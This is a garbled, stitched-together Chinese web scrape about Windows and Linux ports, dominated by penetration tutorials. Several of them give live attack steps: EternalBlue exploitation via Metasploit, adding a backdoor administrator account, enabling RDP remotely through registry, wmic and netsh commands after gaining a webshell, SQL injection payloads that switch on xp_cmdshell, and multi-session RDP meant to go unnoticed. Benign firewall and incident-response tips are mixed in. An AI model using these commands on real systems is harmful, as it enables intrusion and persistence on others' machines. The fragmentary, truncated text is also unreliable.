攻击机kali 目标机win7 sp1(旗舰版) 当nmap或其他工具发现目标及上有445端口开启,可以考虑检测是否存在永恒之蓝,使用msf中的永恒之蓝检测模块 use auxiliary/scanner...blue/blue net user blue blue /add 将用户blue添加入管理组 (不加入会连接不上) net localgroup administrators blue /add 开启远程桌面功能..."Server /v fDenyTSConnections /t REG_DWORD /d 0 /f (实测没问题) Kali远程桌面连接Win7 rdesktop 192.168.194.129:3389...如果选择取消将连接不上,但这样的交互性太强了,容易被发现,因此开启完3389端口后可以用metasploit中的cve-2019-0708模块进行攻击获取shell(这里前提是目标机不是普通的家庭版,要支持远程连接
当我们拿到管理员账号密码的时候,我们需要利用3389端口远程桌面连接到对方服务器,发现3389端口没有开放,此时需要我们远程开启目标服务器3389端口。...新建文件 3389.reg 内容如下: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal...HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] "PortNumber"=dword:00000D3D 此时目标服务器 3389...端口关闭: 上传3389.reg文件到目标服务器 提权之后运行一下 3389.reg 。...regedit /s C:/www/3389.reg 成功开启 3389端口。
2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05 使用方法: 在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如: c:\...>cscript ROTS.vbs [服务端口] [自动重起选项] 服务端口: 设置终端服务的服务端口。...默认是3389。 自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。 使用/fr表示强制重起目标。(如果/r不行,可以试试这个) 使用此参数时,端口设置不能忽略。 ...cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr 上面的命令应该可以理解吧?...脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。
展开全部 方法如下: 1、修改远程桌面连接端口: (1)远程桌面终端服务默认端口为“3389”,为防止他人进行恶意连接,就需要32313133353236313431303231363533e78988e69d8331333365633964...对默认端口进行更改。...2、不能打开到主机的连接,在端口1521:连接失败的解决方法: (1)今天启动工程,突然提示无法连接远程Oracle。...正在连接到10.201.70.68…不能打开到主机的连接, 在端口 1521: 连接失败; (3)Oracle服务器与本机都在局域网内,不存在网络不通问题,怎么会无法连接。...)1521端口处于监听状态,但是从我本机还是无法Telnet服务器端口; (11)我试着telnet 1080端口,发现却可以,唯一的区别就在于一个端口前是“0.0.0.0”,一个是“127.0.0.1
在默认状态下,Windows会打开很多“服务端口”,如果你想查看本机打开了哪些端口、有哪些电脑正在与本机连接,可以使用一些命令很简单的完成 1.利用iis7服务器监控的netstat命令 Windows...其中Local Address代表本机IP地址和打开的端口号(图中本机打开了8080端口),Foreign Address是远程计算机IP地址和端口号,State表明当前TCP的连接状态,图中LISTENING...,选择第二个“端口”。...控制面板\所有控制面板项\Windows 防火墙 进入 入站规则设置 第一步 选择 入站规则 然后 新建规则,选择 端口,然后下一步 第二步 选择TCP 选择特定端口 然后输入端口,如有多个端口需要用逗号隔开了...选择特定端口 然后输入端口,如有多个端口需要用逗号隔开了 例如:88,8080 第三步,选择允许连接 第四步 选择应用规则的范围 第五步 输入规则名称 至此,防火墙规则设置完毕,启用即可!
inux下如何修改iptables开启80端口 最近在做本地服务器的环境,发现网站localhost能正常访问,用ip访问就访问不了,经常使用CentOS的朋友,可能会遇到和我一样的问题。...开启了防火墙导致80端口无法访问,刚开始学习centos的朋友可以参考下。 经常使用CentOS的朋友,可能会遇到和我一样的问题。...这样重启计算机后,CentOS防火墙默认已经开放了80和22端口 简介:CentOS是Linux家族的一个分支。 ...这样重启计算机后,CentOS防火墙默认已经开放了80和22端口。 ...ACCEPT #/sbin/iptables -I INPUT -p tcp --dport 22 -j ACCEPT 然后保存: #/etc/rc.d/init.d/iptables save 再查看是否已经有了
Linux查看Java进程PID、端口号和内存占用脚本 Linux查看Java进程PID、端口号和内存占用脚本 背景 查询PID 查询占用端口 查询内存占用百分比 脚本 使用 背景 正常情况下,一个jps...-ml就可以查看机器上有多少Java进程以及它们的PID,如果还要看端口号,甚至内存占用,就还要配合netstat以及ps等查询,如果直接使用一个命令就能查出所有信息多好呀,那就试试吧。...查询占用端口 使用netstat工具,根据Java进程的PID查询这个PID占用的端口,一定是状态为LISTEN,并且PID/NAME = PID/java的记录。...这在一台机器启多个Java Web项目的时候很有用,比如测试环境一台机器上的多个spring-boot项目,没有网关的情况下,经常搞不清到底访问哪个端口。...逐行读入jps内容 while read LINE do # 首先转换为数组,第一列是PID,第二列是详细描述 JPS_ARRAY=($LINE) # 占用端口
在 Windows Server 2003 中开启 3389 端口: 首先,查看开启的端口——没有开启3389端口 ?...成功开启3389端口: ? 在 Windows Server 2008 和 Windows Server 2012 中开启 3389 端口 查看当前开发端口———未开放3389端口 ?...之后执行如下命令来开启3389端口——管理员权限执行否则会报错 wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting...之后成功开启3389端口: ? 计划任务 通过执行以下命令来查看目标主机上的计划任务信息: schtasks /query /fo LIST /v ?...查域用户信息 net user /domain ?
服务器端口、系统进程安全检测: 打开CMD netstat -an 检查当前系统的连接情况,查看是否存在一些恶意的IP连接,比如开放了一些不常见的端口,正常是用到80网站端口,8888端口,21FTP端口...,3306数据库的端口,443 SSL证书端口,9080 java端口,22 SSH端口,3389默认的远程管理端口,1433 SQL数据库端口。...除以上端口要正常开放,其余开放的端口就要仔细的检查一下了,看是否向外连接。如下图: ? 再一个查看进程,是否存在恶意进程,像木马后门都会植入到进程当中去。...新手如果不懂如何查看进程,可以使用工具,微软的Process Explorer,还有剪刀手,最简单的就是通过任务管理器去查看当前的进程,像linux服务器需要top命令,以及ps命令查看是否存在恶意进程...网站的日志也要开启,IIS下开启日志记录,apache等环境请直接在配置文件中进行日志的开启与日志路径配置。以上就是服务器被黑,该如何的查找被黑的痕迹,下一篇会跟大家讲如何更好的做好服务器的安全部署。
最近在工作上Ranorex自动化测试工具老是连不上服务器,经检查发现服务器的端口号(7266)被其他测试工具占用。...可以在命令窗口上输入netstat -ano查看本机的所有端口号以及对应的进程占用程序(PID)。 打开任务管理器,找到与端口对应的PID,将其关闭,最后重启。
一般管理员建立临时账号是不会建立隐藏账号的,所以一旦查出来有隐藏账号,那么就顺藤摸瓜查一下这个账户的操作日志(日志完好的情况下,这里重点提示了不仅主机要开启日志记录的功能,还要有日志审计服务器)。...敏感端口开放情况 敏感端口指的是什么,指的就是攻击者喜欢的,比如3389、445、135、139、1433、1521、3306等,如果这样的端口暴漏在公网服务器,那么后果不堪设想。...我们来拿3389远程桌面服务端口来说一下,当我们知道攻击者是通过远程桌面登陆到服务器的,那么我们就可以查一下他们是怎么登陆进来的?...首先我们需要问一下3389是否对外网开放,是否开启了地址白名单限制、密码是否是弱口令等问题,我们来看一下服务器日志记录了什么,通过与管理员沟通,发现密码是123456?????这是什么操作?...如果是这样的话我们需要与客户沟通在不影响业务的前提下封掉3389端口、修改口令强度。小白提醒一下,即使管理员修改了3389端口,攻击者也照样会通过端口扫描扫出来的。
DOS查找Windwos远程桌面端口 方法一 查看是否开启了远程桌面服务: net start | findstr "Terminal Services" 如果Windows打开了远程桌面,可以先查看远程桌面..."TermService" svchost.exe 2140 TermService TermService是远程桌面的服务名称,2140是它的进程PID 我们可以查找PID就可以找到远程桌面的端口了...: C:\Users\Administrator>netstat -ano | findstr "2140" TCP 0.0.0.0:3389 0.0.0.0:0...LISTENING 2140 TCP [::]:3389 [::]:0 LISTENING 2140 端口是3389...HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 0xd3d转换为十进制就是3389
在Redhat 7上80端口默认是被过滤掉的,因此我们仅仅能在本机使用localhost访问这个端口,而不能从其他机器上访问这个端口。...如果要打开80端口我们需要添加一个iptables规则,对于RHEL7我们可以使用firewall-cmd命令来添加。...首先用以下命令添加80端口: [root@rhel7 ~]# firewall-cmd --zone=public --add-port=80/tcp --permanent 然后用以下命令重启firewall...如果你想屏蔽或者移除80端口,也可以用firewall-cmd命令: [root@rhel7 ~]# iptables-save | grep 80 -A IN_public_allow -p tcp
0x01 查询是否开启3389 1.1 3389开启的进程名为TermService,所以我们可以查看是否开启这个进程 ? tasklist /svc | findstr TermService ?...0x02 查看rdp开启具体端口 很多运维为了安全起见可能会修改默认3389端口为其他端口 2.1 tasklist /svc | findstr TermServicenetstat -ano | findstr...0x03 如何开启3389 如果获取到目标高权限的webshell可以通过命令开启3389 3.1 允许3389端口放行 netsh advfirewall firewall add rule name...=”Remote Desktop” protocol=TCP dir=in localport=3389 action=allow ①:通用开3389(优化后): wmic RDTOGGLE WHERE...前文写过如何获取保存后的密码,现在来讲解如何hook。 6.1 Detours库 该库支持 32 位和 64 位进程,这里拿MessageBox函数来进行讲解。
然后再扫一波端口,狠一点,直接1-10000扫。但是端口只有80和3306。没开3389难受 ? 经过路径扫描后,对扫出来的东东一一进行访问,测了一些漏洞,有目录遍历,xss、什么的。...可以使用mimikazt捉密码,但是3389前面用nmap扫了也没开,需要cmd开启一下远程,不过我想饶下路子,都到这里了。要不试下创建个账号,给他留点东西以表我来过。。...剩下一个难关啦,开启3389,然后,哈哈哈哈~~事不宜迟,马上动手。 这里我使用了这条命令进行开启————百度找的。...查看是否开启。...已成功开启3389。接着就是远程远程上去啦。 ? 至此,成功拿下服务器管理员权限!!!
0x2.内网渗透 首先查看是什么权限,是否有域 ?...管理员权限,且有域~ 然后一般拿下window的话我都会选择去连接它的远程桌面(PORT:3389) 输入netstat -ano | find “3389”没有回显,证明未开启远程桌面服务,用如下命令开启...fuck 一开始猜测可能是防火墙禁止3389端口进出网,然后经过端口转发后才发现并不是,如图 ?...查看是否添加成功 ?...然后开启他的3389 2003上开启3389的命令行语句 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections
远程桌面方法最好内网使用,外网需要有固定IP地址,且3389端口访问权限。 本方法在Ubuntu 16.04和18.04的系统中测试通过。其它版本系统有问题,可多上网搜索解决方案。...apt-get install xubuntu-desktop 向xsession中写入xfce4-session(每个用户自己运行此行) echo "xfce4-session" >~/.xsession 开启...ifconfig Windows端 启动远程桌面连接(开始菜单中可以找到,找不到搜索一下),输入IP地址连接;注意IP地址可以是服务器的内网(需要用户在同一网段)或外网(需要开通3389端口访问权限)均可...弹出窗口中输入用户名和密码点OK,即可打开远程桌面: 这样性能强悍的计算机就变成了你的桌面,可以运行需要几十G、百G内存的程序(前提是你服务器够强大),结果可以直接查看,是不是很方便。
0x02 尝试多语句执行添加用户 查看是否有 xp_cmdshell Payload:admin';if(1=(select count(*) from master.dbo.sysobjects where...开启 xp_cmdshell Payload:admin';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure...添加用户 看了下端口,3389开着 ➜ sudo nmap -sS -Pn -n -p3389 123.xxx.xxx.180 Password: Starting Nmap 7.70 ( https...PORT STATE SERVICE 3389/tcp open ms-wbt-server Nmap done: 1 IP address (1 host up) scanned
文章前言 本篇文章我们主要介绍在拿下目标域内主机的情况下,如何多开RDP链接且使得正常登录目标主机的用户不会被强制下线或者发现 具体实现 测试环境 域内主机:Windows 7 主机地址:192.168.174.170...简单小结: 相同账户:需要设计到图形化操作,在前期渗透过程中略显鸡肋,后期团队协作中可以有较好的辅助作用 不同账户:可以实现多用户同时登录对目标进行渗透测试 扩展补充 a、查看是否开启远程桌面: REG...b、查看远程桌面的端口号 REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations...multi_console_command -r /root/.msf4/loot/20191203031341_default_192.168.80.132_host.windows.cle_476697.txt e、修改防火墙允许3389...端口通过 netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action
领取专属 10元无门槛券
手把手带您无忧上云